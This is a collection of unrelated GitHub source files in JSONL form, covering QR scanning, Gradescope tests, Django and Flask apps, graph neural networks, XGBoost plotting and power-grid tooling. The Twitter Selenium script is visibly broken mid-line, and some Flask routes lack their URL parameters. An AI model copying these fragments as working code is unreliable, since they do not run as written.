+{"seq_id":"70917028808","text":"import cv2\nimport datetime\nfrom pyzbar.pyzbar import decode \n\nCam = cv2.VideoCapture(0)\ndetector = cv2.QRCodeDetector()\nwhile True:\n _,img=Cam.read()\n data,one, _=detector.detectAndDecode(img)\n success, frame = Cam.read()\n if data:\n a=data\n break\n cv2.imshow('Smile!',img)\n if cv2.waitKey(1)==ord('v'):\n continue\n for captureinfomartions in decode(frame):\n #Convert Informations to text file\n Make_txt_file = open(\"Information.txt\", \"w\")\n Make_txt_file.write(f\"{captureinfomartions.data.decode('utf-8')}\\n\" )\n \n #Add the time and date when data is scanned\n Date = datetime.datetime.now()\n Make_txt_file.write(Date.strftime(\"Date: %m/%d/%y \\n\"))\n Make_txt_file.write(Date.strftime(\"Time: %H:%M:%S\")) \n Make_txt_file.close()\n\nCam.release(a)\ncv2.destroyAllWindows()","repo_name":"edgarpesguerrajr/Assignment10","sub_path":"10.1.py","file_name":"10.1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43494410943","text":"\"\"\"Tests for the submission metadata parser.\"\"\"\n\nfrom importlib.resources import files\nfrom os.path import join as pathjoin\nfrom pathlib import Path\nfrom shutil import copyfileobj\n\nimport pytest\n\nfrom aga.gradescope.metadata import (\n GradescopeAssignmentMetadata,\n GradescopeSubmissionMetadata,\n load_submission_metadata_from_path,\n)\n\n\ndef test_example_metadata_id(example_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that the example metadata file's id is correct.\"\"\"\n assert example_metadata.id == 123456\n\n\ndef test_example_metadata_upload(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's upload is correct.\"\"\"\n assert example_metadata.submission_method == \"upload\"\n\n\ndef test_example_metadata_created_at(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's created at is correct.\"\"\"\n time = example_metadata.created_at\n assert time.year == 2018\n assert time.month == 7\n assert time.day == 1\n assert time.hour == 14\n assert time.minute == 22\n assert time.second == 32\n\n\ndef test_example_metadata_previous_submissions(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous submissions is empty.\"\"\"\n assert example_metadata.previous_submissions == []\n\n\ndef test_example_metadata_users(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous user is correct.\"\"\"\n users = example_metadata.users\n assert len(users) == 1\n\n user = users[0]\n assert user.email == \"student@example.com\"\n assert user.id == 1234\n assert user.name == \"Student User\"\n\n\n@pytest.fixture(name=\"example_metadata_assignment\")\ndef fixture_example_metadata_assignment(\n example_metadata: GradescopeSubmissionMetadata,\n) -> GradescopeAssignmentMetadata:\n \"\"\"Get the example metadata's assignment object.\"\"\"\n return example_metadata.assignment\n\n\ndef test_example_assignment_metadata_name(\n example_metadata_assignment: GradescopeAssignmentMetadata,\n) -> None:\n \"\"\"Test that the example metadata's assignment's name is correct.\"\"\"\n assert example_metadata_assignment.title == \"Programming Assignment 1\"\n\n\n@pytest.fixture(name=\"late_due_date_metadata\")\ndef fixture_late_due_date_metadata(tmp_path: Path) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"metadata_with_late_due_date.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\n@pytest.fixture(name=\"multiple_submission_metadata\")\ndef fixture_multiple_submission_metadata(\n tmp_path: Path,\n) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"multiple_submission_metadata.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\ndef test_late_due_date(late_due_date_metadata: GradescopeSubmissionMetadata) -> 
None:\n \"\"\"Test that we properly loda late due dates.\"\"\"\n assert late_due_date_metadata.assignment.late_due_date is not None\n assert late_due_date_metadata.assignment.late_due_date.year == 2022\n assert late_due_date_metadata.assignment.late_due_date.month == 8\n\n\ndef test_multiple_submission(\n multiple_submission_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that we properly load previous submissions.\"\"\"\n assert len(multiple_submission_metadata.previous_submissions) == 4\n","repo_name":"nihilistkitten/aga","sub_path":"tests/test_gradescope/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"26021583196","text":"# Задача 1\n# На столе лежат n монеток. Некоторые из них лежат вверх решкой, \n# а некоторые – гербом. Определите минимальное число монеток, \n# которые нужно перевернуть, чтобы все монетки были повернуты \n# вверх одной и той же стороной. Выведите минимальное количество \n# монет, которые нужно перевернуть\n# 5 -> 1 0 1 1 0\n# 2\n\nprint('----------------------------------')\ncount = int(input(\"Введите количество монет \"))\nprint(\"1 = орел, 0 = решка\")\n\ncoin = [0] * count # массив монет\ntails = 0 # кол-во решек\n\nfor i in range(0, count): # да, я мог написать вместо range -> count, но тогда бы я не смогу выводить счет монет \n coin[i] = int(input(f\"{i + 1} монета лежит вверх: \"))\n if coin[i] == 0:\n tails = tails + 1\n\nprint()\nif tails < (count / 2):\n print(tails)\nelse:\n print(count - tails)\nprint('----------------------------------')","repo_name":"GRxAK/Python_start","sub_path":"lesson_02/homework_01.py","file_name":"homework_01.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19008540681","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http.response import JsonResponse\n\n# Imports to recommendations\nimport numpy as np\nimport nltk\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport ast\nimport pandas as pd\nimport json\n\nps = PorterStemmer()\ncv = CountVectorizer(max_features = 5000, stop_words='english')\nrecetas = pd.read_csv('./RecomendApp/recetas.csv')\nrecetas = recetas[['_id', 'nombre', 'calorias', 'carbohidratos', 'categoria', 'grasa', 'proteina', 'tiempoPreparacion', 'ingredientes']]\n\ndef convert(obj):\n L = []\n for i in ast.literal_eval(obj):\n L.append(i['idIngrediente'])\n return L\n\ndef convert2(obj):\n L = []\n for i in json.loads(obj):\n if i['vegetarian'] == \"true\":\n L.append('vegetarian')\n else:\n L.append('novegetarian')\n\n if i['vegan'] == \"true\":\n L.append('vegan')\n else:\n L.append('novegan')\n\n if i['glutenFree'] == \"true\":\n L.append('glutenfree')\n else:\n L.append('noglutenfree')\n\n if i['dairyFree'] == \"true\":\n L.append('dairyfree')\n else:\n L.append('nodairyfree')\n\n if i['veryHealthy'] == \"true\":\n L.append('veryHealthy')\n else:\n L.append('noveryHealthy')\n\n return L\n\ndef convert3(obj):\n L = []\n L.append(str(obj))\n return L\n\ndef stem(text):\n y = []\n\n for i in text.split():\n y.append(ps.stem(i))\n return \" \".join(y)\n\ndef recommend(receta):\n recomend = []\n receta = int(receta)\n receta_index = new_df[new_df['_id'] == receta].index[0]\n distances = similarity[receta_index]\n recetas_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n for i in recetas_list:\n recomend.append(recetas.iloc[i[0]]._id)\n\n return recomend\n\nrecetas['ingredientes'] = recetas['ingredientes'].apply(convert)\nrecetas['categoria'] = recetas['categoria'].apply(convert2)\n\nrecetas['categoria'] = recetas['categoria'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\nrecetas['ingredientes'] = recetas['ingredientes'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\n\nrecetas['calorias'] = recetas['calorias'].apply(convert3)\nrecetas['carbohidratos'] = recetas['carbohidratos'].apply(convert3)\nrecetas['grasa'] = recetas['grasa'].apply(convert3)\nrecetas['proteina'] = recetas['proteina'].apply(convert3)\nrecetas['tiempoPreparacion'] = recetas['tiempoPreparacion'].apply(convert3)\n\nrecetas['tags'] = recetas['calorias'] + recetas['carbohidratos'] + recetas['grasa'] + recetas['proteina'] + recetas['tiempoPreparacion'] + recetas['ingredientes'] + recetas['categoria']\nnew_df = recetas[['_id', 'nombre', 'tags']]\nnew_df['tags'] = new_df['tags'].apply(lambda x:\" \".join(x))\nnew_df['tags'] = new_df['tags'].apply(lambda x:x.lower())\nnew_df['tags'] = new_df['tags'].apply(stem)\n\nvectors = cv.fit_transform(new_df['tags']).toarray()\nsimilarity = cosine_similarity(vectors)\n\n# Create your views here.\n\n@csrf_exempt\ndef recomendarApi(request, title):\n if request.method=='GET':\n recomendacion = recommend(title)\n response = np.array(recomendacion, dtype=np.int32)\n return JsonResponse({\"response\": response.tolist()}, safe=False)\n\n@csrf_exempt\ndef recomendarHistorialApi(request,historial):\n if request.method=='GET':\n x = historial.split(',')\n y = []\n for i in x:\n recommendation = recommend(i)\n for j in recommendation:\n y.append(j)\n\n response = np.array(y, dtype=np.int32)\n return 
JsonResponse({\"recomend\": response.tolist()},safe=False)","repo_name":"Emerdinger/api-django","sub_path":"RecomendApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23805695787","text":"from flask import render_template,request,redirect,url_for,abort,flash\nfrom . import main\nfrom flask_login import login_required,current_user\nfrom ..models import User,Pitch,Comment\nfrom .forms import UpdateProfile,PitchForm,CommentForm\nfrom .. import db,photos\n# import markdown2\n\n# Views\n@main.route('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n title = 'Pitch Application'\n pitch = Pitch.query.all()\n # categories = Category.get_categories()\n return render_template('index.html',title = title, Pitch = pitch)\n\n@main.route('/pitch/new', methods=['GET','POST'])\n@login_required\ndef new_pitch():\n form=PitchForm()\n if form.validate_on_submit():\n pitches=Pitch(category=form.category.data,pitch_content=form.content.data)\n db.session.add(pitches)\n db.session.commit()\n\n flash('pitch created')\n\n pitches=Pitch.query.all()\n return render_template('pitch.html',form=form, pitch=pitches)\n\n\n@main.route('/category/')\ndef category(id):\n\n category = PitchCategory.query.get(id)\n category_name = PitchCategory.query.get(category_name)\n\n if category is None:\n abort(404)\n\n pitch_in_category = Pitch.get_pitch(id)\n return render_template('category.html' ,category= category, pitch= pitch_in_category)\n\n\n@main.route('/pitch/comments/new/',methods = ['GET','POST'])\n@login_required\ndef new_comment(id):\n form = CommentForm()\n if form.validate_on_submit():\n new_comment = Comment(pitch_id =id,data=form.comment.data)\n new_comment.save_comment()\n return redirect(url_for('main.new_pitch'))\n return render_template('ncomment.html', form=form)\n\n@main.route('/comments/')\ndef single_comment(id):\n comment=Comment.query.get(id)\n if comment is None:\n abort(404)\n return render_template('new_comment.html')\n\n@main.route('/view/comment/')\ndef view_comments(id):\n '''\n Function that shows the comments of a particular pitch\n '''\n comments = Comment.get_comments(id)\n \n return render_template('viewcomment.html',comments = comments, id=id)\n\n@main.route('/user/')\ndef profile(uname):\n user = User.query.filter_by(username = uname).first()\n\n if user is None:\n abort(404)\n\n return render_template(\"profile/profile.html\",user = user)\n\n@main.route('/user//update',methods = ['GET','POST'])\n@login_required\ndef update_profile(uname):\n user = User.query.filter_by(username = uname).first()\n if user is None:\n abort(404)\n\n form = UpdateProfile()\n\n if form.validate_on_submit():\n user.bio = form.bio.data\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('.profile',uname=user.username))\n\n return render_template('profile/update.html',form =form)\n\n@main.route('/user//update/pic',methods= ['POST'])\n@login_required\ndef update_pic(uname):\n user = User.query.filter_by(username = uname).first()\n if 'photo' in request.files:\n filename = photos.save(request.files['photo'])\n path = f'photos/{filename}'\n user.profile_pic_path = path\n db.session.commit()\n return redirect(url_for('main.profile',uname=uname))","repo_name":"edithamadi/pitch_one","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"576660781","text":"# MOFTransformer version 2.0.0\r\nimport random\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass ConvLayer(nn.Module):\r\n \"\"\"\r\n Convolutional operation on graphs\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(self, atom_fea_len, nbr_fea_len):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.fc_full = nn.Linear(\r\n 2 * self.atom_fea_len + self.nbr_fea_len, 2 * self.atom_fea_len\r\n )\r\n self.sigmoid = nn.Sigmoid()\r\n self.softplus1 = nn.Softplus()\r\n self.bn1 = nn.BatchNorm1d(2 * self.atom_fea_len)\r\n self.bn2 = nn.BatchNorm1d(self.atom_fea_len)\r\n self.softplus2 = nn.Softplus()\r\n\r\n def forward(self, atom_in_fea, nbr_fea, nbr_fea_idx):\r\n \"\"\"\r\n Forward pass\r\n\r\n N: Total number of atoms in the batch\r\n M: Max number of neighbors\r\n\r\n Args:\r\n atom_in_fea: Variable(torch.Tensor) shape (N, atom_fea_len)\r\n Atom hidden features before convolution\r\n nbr_fea: Variable(torch.Tensor) shape (N, M, nbr_fea_len)\r\n Bond features of each atom's M neighbors\r\n nbr_fea_idx: torch.LongTensor shape (N, M)\r\n Indices of M neighbors of each atom\r\n\r\n Returns:\r\n\r\n atom_out_fea: nn.Variable shape (N, atom_fea_len)\r\n Atom hidden features after convolution\r\n\r\n \"\"\"\r\n\r\n N, M = nbr_fea_idx.shape\r\n # convolution\r\n atom_nbr_fea = atom_in_fea[nbr_fea_idx, :] # [N, M, atom_fea_len]\r\n\r\n total_nbr_fea = torch.cat(\r\n [\r\n atom_in_fea.unsqueeze(1).expand(N, M, self.atom_fea_len),\r\n # [N, atom_fea_len] -> [N, M, atom_fea_len] -> v_i\r\n atom_nbr_fea, # [N, M, atom_fea_len] -> v_j\r\n nbr_fea,\r\n ], # [N, M, nbr_fea_len] -> u(i,j)_k\r\n dim=2,\r\n )\r\n # [N, M, atom_fea_len*2+nrb_fea_len]\r\n\r\n total_gated_fea = self.fc_full(total_nbr_fea) # [N, M, atom_fea_len*2]\r\n total_gated_fea = self.bn1(\r\n total_gated_fea.view(-1, self.atom_fea_len * 2)\r\n ).view(\r\n N, M, self.atom_fea_len * 2\r\n ) # [N, M, atom_fea_len*2]\r\n nbr_filter, nbr_core = total_gated_fea.chunk(2, dim=2) # [N, M, atom_fea_len]\r\n nbr_filter = self.sigmoid(nbr_filter)\r\n nbr_core = self.softplus1(nbr_core)\r\n nbr_sumed = torch.sum(nbr_filter * nbr_core, dim=1) # [N, atom_fea_len]\r\n nbr_sumed = self.bn2(nbr_sumed)\r\n out = self.softplus2(atom_in_fea + nbr_sumed) # [N, atom_fea_len]\r\n return out\r\n\r\n\r\nclass GraphEmbeddings(nn.Module):\r\n \"\"\"\r\n Generate Embedding layers made by only convolution layers of CGCNN (not pooling)\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(\r\n self, atom_fea_len, nbr_fea_len, max_graph_len, hid_dim, n_conv=3, vis=False\r\n ):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.max_graph_len = max_graph_len\r\n self.hid_dim = hid_dim\r\n self.embedding = nn.Embedding(119, atom_fea_len) # 119 -> max(atomic number)\r\n self.convs = nn.ModuleList(\r\n [\r\n ConvLayer(atom_fea_len=atom_fea_len, nbr_fea_len=nbr_fea_len)\r\n for _ in range(n_conv)\r\n ]\r\n )\r\n self.fc = nn.Linear(atom_fea_len, hid_dim)\r\n\r\n self.vis = vis\r\n\r\n def forward(\r\n self, atom_num, nbr_idx, nbr_fea, crystal_atom_idx, uni_idx, uni_count, moc=None\r\n ):\r\n \"\"\"\r\n Args:\r\n atom_num (tensor): [N', atom_fea_len]\r\n nbr_idx (tensor): [N', M]\r\n nbr_fea (tensor): [N', M, nbr_fea_len]\r\n crystal_atom_idx (list): [B]\r\n uni_idx (list) : [B]\r\n uni_count (list) : [B]\r\n Returns:\r\n new_atom_fea (tensor): [B, max_graph_len, hid_dim]\r\n mask (tensor): [B, 
max_graph_len]\r\n \"\"\"\r\n assert self.nbr_fea_len == nbr_fea.shape[-1]\r\n\r\n atom_fea = self.embedding(atom_num) # [N', atom_fea_len]\r\n for conv in self.convs:\r\n atom_fea = conv(atom_fea, nbr_fea, nbr_idx) # [N', atom_fea_len]\r\n atom_fea = self.fc(atom_fea) # [N', hid_dim]\r\n\r\n new_atom_fea, mask, mo_label = self.reconstruct_batch(\r\n atom_fea, crystal_atom_idx, uni_idx, uni_count, moc\r\n )\r\n # [B, max_graph_len, hid_dim], [B, max_graph_len]\r\n return new_atom_fea, mask, mo_label # None will be replaced with MOC\r\n\r\n def reconstruct_batch(self, atom_fea, crystal_atom_idx, uni_idx, uni_count, moc):\r\n batch_size = len(crystal_atom_idx)\r\n\r\n new_atom_fea = torch.full(\r\n size=[batch_size, self.max_graph_len, self.hid_dim], fill_value=0.0\r\n ).to(atom_fea)\r\n\r\n mo_label = torch.full(\r\n size=[batch_size, self.max_graph_len], fill_value=-100.0\r\n ).to(atom_fea)\r\n\r\n for bi, c_atom_idx in enumerate(crystal_atom_idx):\r\n # set uni_idx with (descending count or random) and cut max_graph_len\r\n idx_ = torch.LongTensor([random.choice(u) for u in uni_idx[bi]])[\r\n : self.max_graph_len\r\n ]\r\n rand_idx = idx_[torch.randperm(len(idx_))]\r\n if self.vis:\r\n rand_idx = idx_\r\n new_atom_fea[bi][: len(rand_idx)] = atom_fea[c_atom_idx][rand_idx]\r\n\r\n if moc:\r\n mo = torch.zeros(len(c_atom_idx))\r\n metal_idx = moc[bi]\r\n mo[metal_idx] = 1\r\n mo_label[bi][: len(rand_idx)] = mo[rand_idx]\r\n\r\n mask = (new_atom_fea.sum(dim=-1) != 0).float()\r\n\r\n return new_atom_fea, mask, mo_label\r\n","repo_name":"hspark1212/MOFTransformer","sub_path":"moftransformer/modules/cgcnn.py","file_name":"cgcnn.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"16"}
+{"seq_id":"28896004403","text":"def solution(s, e, sum1):\n global flag, K\n\n if flag == 1:\n return\n if sum1 > K:\n return\n if sum1 == K:\n flag = 1\n return\n if s == e:\n return\n\n solution(s+1, e, sum1)\n solution(s+1, e, sum1+data[s])\n\n\nT = int(input())\nfor i in range(T):\n N, K = map(int, input().split())\n data = list(map(int, input().split()))\n flag = 0\n solution(0, N, 0)\n if flag == 1:\n print(\"YES\")\n else:\n print(\"NO\")\n\n\n","repo_name":"jho0078/til","sub_path":"algorithm/D24_2019_03_28(AD)/더하기.py","file_name":"더하기.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"307703819","text":"from bs4 import BeautifulSoup as BS\nfrom selenium import webdriver\nfrom msedge.selenium_tools import Edge, EdgeOptions\nfrom selenium.webdriver.common.keys import Keys\nfrom werkzeug.wrappers import response\nfrom data import Twitter\nfrom scripts import tweeting\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Protocol.KDF import PBKDF2\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nimport time\n\n#login data\n# username = Twitter['username']\n# password = Twitter['password']\n\n# salt storing\nsalt = b'\\xec\\x86\\xc6\\xcao?3`.\\xe8\\x86\\x0b\\xcd?I\\x8dV\\x808c\\x94\\x03\\x95~\\xf3\\xb7 problem is the instienace\n# functional programming =>","repo_name":"OsamaElsherif/socialmedia","sub_path":"webApplication/twiiter.py","file_name":"twiiter.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28924195510","text":"#!/usr/bin/env python\n\n\"\"\"\nStart the process and dump the documentation to the doc dir\n\"\"\"\n\nimport socket, subprocess, time,os\n\nenv = os.environ\nenv['L1FWD_BTS_HOST'] = '127.0.0.1'\n\nbts_proc = subprocess.Popen([\"./src/osmo-bts-sysmo/sysmobts-remote\",\n\t\t\"-c\", \"./doc/examples/sysmo/osmo-bts-sysmo.cfg\"], env = env,\n\t\tstdin=None, stdout=None)\ntime.sleep(1)\n\ntry:\n\tsck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tsck.setblocking(1)\n\tsck.connect((\"localhost\", 4241))\n\tsck.recv(4096)\n\n\t# Now send the command\n\tsck.send(\"show online-help\\r\")\n\txml = \"\"\n\twhile True:\n\t\tdata = sck.recv(4096)\n\t\txml = \"%s%s\" % (xml, data)\n\t\tif data.endswith('\\r\\nOsmoBTS> '):\n\t\t\tbreak\n\n\t# Now write everything until the end to the file\n\tout = open('doc/vty_reference.xml', 'w')\n\tout.write(xml[18:-11])\n\tout.close()\nfinally:\n\t# Clean-up\n\tbts_proc.kill()\n\tbts_proc.wait()\n\n","repo_name":"osmocom/osmo-bts","sub_path":"contrib/dump_docs.py","file_name":"dump_docs.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"16"}
+{"seq_id":"73390894408","text":"from django.contrib import admin\r\nfrom .models import Product, Order, OrderItem\r\n\r\n\r\nclass ProductAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product_name', 'stock')\r\n ordering = ('-stock',)\r\n\r\n\r\nclass OrderAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('source', 'order_id')\r\n\r\n\r\nclass OrderItemAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product',)\r\n\r\n\r\n# Register your models here.\r\nadmin.site.register(Product, ProductAdmin)\r\nadmin.site.register(Order, OrderAdmin)\r\nadmin.site.register(OrderItem, OrderItemAdmin)\r\n","repo_name":"harikrishna-gujje/ecommerce_api","sub_path":"simpleapi/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"14014173799","text":"import os, time, json, argparse\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom EventIDs import IDs\nfrom Plot_maker import low_stat_Z\n\nprint(xgb.__version__)\n\nt0 = time.time()\nstart = time.asctime(time.localtime())\nprint('Started', start)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--met_reg', type=str, default=\"50-100\", help=\"MET signal region\")\nparser.add_argument('--dm_model', type=str, default=\"DH_HDS\", help=\"Dataset to test\")\nparser.add_argument('--channel', type=str, default=\"ee\", help=\"Lepton channel to test\")\nargs = parser.parse_args()\n\nmet_reg = args.met_reg\ndm_model = args.dm_model\nchannel = args.channel \n\n\n\nN = 9\nplt.rcParams[\"axes.prop_cycle\"] = plt.cycler(\"color\", plt.cm.PuRd_r(np.linspace(0.1,0.95,N)))\n\ndef Z_score_array(sig_pred, bkg_pred):\n np.seterr(divide='ignore', invalid='ignore') # Remove true divide message\n return [low_stat_Z(sum(sig_pred[25:]), sum(bkg_pred[25:])), \n low_stat_Z(sum(sig_pred[30:]), sum(bkg_pred[30:])), \n low_stat_Z(sum(sig_pred[35:]), sum(bkg_pred[35:])),\n low_stat_Z(sum(sig_pred[40:]), sum(bkg_pred[40:])), \n low_stat_Z(sum(sig_pred[45:]), sum(bkg_pred[45:])), \n low_stat_Z(sig_pred[-1], bkg_pred[-1])]\n\nnp_dir = '/storage/racarcam/Data/XGB_frfr/'+met_reg+'/'+dm_model+'/'\n\nsig_mzp_130 = np.load(np_dir+'mZp_130/sig_pred_'+channel+'.npy')\nsig_mzp_200 = np.load(np_dir+'mZp_200/sig_pred_'+channel+'.npy')\nsig_mzp_400 = np.load(np_dir+'mZp_400/sig_pred_'+channel+'.npy')\nsig_mzp_600 = np.load(np_dir+'mZp_600/sig_pred_'+channel+'.npy')\n\nbkg_mzp_130 = np.load(np_dir+'mZp_130/bkg_pred_'+channel+'.npy')\nbkg_mzp_200 = np.load(np_dir+'mZp_200/bkg_pred_'+channel+'.npy')\nbkg_mzp_400 = np.load(np_dir+'mZp_400/bkg_pred_'+channel+'.npy')\nbkg_mzp_600 = np.load(np_dir+'mZp_600/bkg_pred_'+channel+'.npy')\n\nmodel_dsids = []\njson_file = open('DM_DICT_Zp_dsid.json')\nDM_file = json.load(json_file)\nfor key in DM_file.keys():\n word = key.split('_')\n model_sec = word[0]+'_'+word[1]\n if model_sec == dm_model.lower():\n model_dsids.append(DM_file[key])\n\njson_file2 = open('DM_DICT.json')\nmodel_names = json.load(json_file2)\nsave_as = 'mZp_'+model_names[model_dsids[0][0]].split(' ')[-2]+'/'\n\nplot_dir = '../../Plots/XGBoost/Model_independent_frfr/'+met_reg+'/'+dm_model+'/'\n\nplt.figure(figsize=(11,8))\nX_axis = [0.5, 0.6, 0.7, 0.8, 0.9, 0.99]\nY_axis_130 = Z_score_array(sig_mzp_130, bkg_mzp_130)\nY_axis_200 = Z_score_array(sig_mzp_200, bkg_mzp_200)\nY_axis_400 = Z_score_array(sig_mzp_400, bkg_mzp_400)\nY_axis_600 = Z_score_array(sig_mzp_600, bkg_mzp_600)\n\nplt.figure(figsize=[10,6])\nplt.plot(X_axis, Y_axis_130, linestyle='--')\nplt.scatter(X_axis, Y_axis_130, label = \"$m_{Z'}$ 130 GeV\")\nplt.plot(X_axis, Y_axis_200, linestyle='--')\nplt.scatter(X_axis, Y_axis_200, label = \"$m_{Z'}$ 200 GeV\")\nplt.plot(X_axis, Y_axis_400, linestyle='--')\nplt.scatter(X_axis, Y_axis_400, label = \"$m_{Z'}$ 400 GeV\")\nplt.plot(X_axis, Y_axis_600, linestyle='--')\nplt.scatter(X_axis, Y_axis_600, label = \"$m_{Z'}$ 600 GeV\")\nplt.xlim([0,1])\nplt.ylim([np.nanmin(Y_axis_600)*0.9, np.nanmax(Y_axis_130)*1.1])\nplt.yscale('log')\nplt.grid(True)\nplt.legend()\nplt.ylabel('Expected significance [$\\sigma$]')\nif met_reg =='50-100':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR1\")\nelif met_reg =='100-150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' 
'+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR2\")\nelif met_reg =='150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR3\")\nplt.xlabel('XGBoost output')\nplt.savefig(plot_dir+'EXP_SIG_'+channel+'.pdf')\n\n","repo_name":"rubenguevara/Master-Thesis","sub_path":"ML/XGBoost/FULL_model_independent_testing_plot_sig.py","file_name":"FULL_model_independent_testing_plot_sig.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"27637485119","text":"import os\nimport sys\n\n\ndef pairedEnd(R1, R2):\n print(sys.path)\n try:\n os.popen(\" \".join(\n ['trimmomatic PE -phred33 ',\n R1,\n R2,\n R1+'.paired',\n R1+'.unpaired',\n R2+'.paired',\n R2+'.unpaired',\n 'LEADING:3',\n 'TRAILING:3',\n 'SLIDINGWINDOW:4:15',\n 'MINLEN:36'\n ])).read()\n return True\n except:\n return False\n","repo_name":"gaarangoa/deeparg","sub_path":"deeparg/short_reads_pipeline/tools/trimmomaticClass.py","file_name":"trimmomaticClass.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"17394387354","text":"import json\nimport os\nimport numpy as np\n\nfrom grid2op.Parameters import Parameters\nfrom oracle4grid.core.utils.config_ini_utils import MAX_ITER\n\nfrom oracle4grid.core.utils.constants import EnvConstants\nfrom oracle4grid.core.utils.prepare_environment import prepare_env\n#from oracle4grid.core.oracle import oracle\n\nASSET_MAPPING = {\"line (origin)\":\"lines_id_bus\",\n \"line (extremity)\":\"lines_id_bus\",\n \"generator\":\"gens_id_bus\",\n \"load\":\"loads_id_bus\"}\n\n#def load_and_run(env_dir, chronic, action_file, debug,agent_seed,env_seed, config, constants=EnvConstants()):\n# atomic_actions, env, debug_directory, chronic_id = load(env_dir, chronic, action_file, debug, constants=constants, config = config)\n# # Parse atomic_actions format\n# # atomic_actions = parse(atomic_actions,env)\n# parser = OracleParser(atomic_actions, env.action_space)\n# atomic_actions = parser.parse()\n#\n# # Run all steps\n# return oracle(atomic_actions, env, debug, config, debug_directory=debug_directory,agent_seed=agent_seed,env_seed=env_seed,\n# grid_path=env_dir, chronic_scenario=chronic, constants=constants)\n\n\ndef load(env_dir, chronic, action_file, debug, constants=EnvConstants(), config = None, opponent_allowed=True):\n param = Parameters()\n param.init_from_dict(constants.DICT_GAME_PARAMETERS_SIMULATION)\n env, chronic_id = prepare_env(env_dir, chronic, param, opponent_allowed=opponent_allowed)\n\n # Load unitary actions\n with open(action_file) as f:\n atomic_actions = json.load(f)\n\n # Init debug 